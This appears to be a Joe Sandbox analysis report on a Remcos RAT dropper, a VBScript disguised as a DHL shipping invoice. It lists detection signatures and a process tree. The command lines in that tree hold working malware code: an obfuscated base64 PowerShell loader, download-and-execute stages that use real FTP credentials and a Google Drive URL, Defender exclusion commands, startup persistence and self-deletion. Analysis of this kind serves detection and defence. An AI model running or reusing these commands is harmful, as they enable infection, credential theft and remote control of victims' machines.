Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHLShippingInvoicesAwbBL000000000102220242247.vbs

Overview

General Information

Sample name:DHLShippingInvoicesAwbBL000000000102220242247.vbs
Analysis ID:1539088
MD5:d68363e3776ef2ea3277d9b24edd935b
SHA1:dedcbb524e3fa621b716fbb4f4dea800e6279e1a
SHA256:a22fb5a6beb7587e89ed509ba36d193070c2cb7ef5cc9cb2393823037265c39b
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5460 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAcg' + [char]66 + 'kAHoAeQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAcQ' + [char]66 + 'sAHIAcgAkACgAIAA9ACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAKAAgAD0AIA' + [char]66 + 'xAHEAbA' + [char]66 + 'yAHIAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAcQ' + [char]66 + 'sAHIAcgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$hsdzv = $qKKzc; ;$hsdzv = $qKKzc.replace('???' , 'B') ;;$qqbfx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqbfx MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6908 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 7084 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4852 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7340 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7372 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7820 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AddInProcess32.exe (PID: 8160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 4456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 5024 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 1516 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • cmd.exe (PID: 7832 cmdline: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7996 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8100 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 5820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • AddInProcess32.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
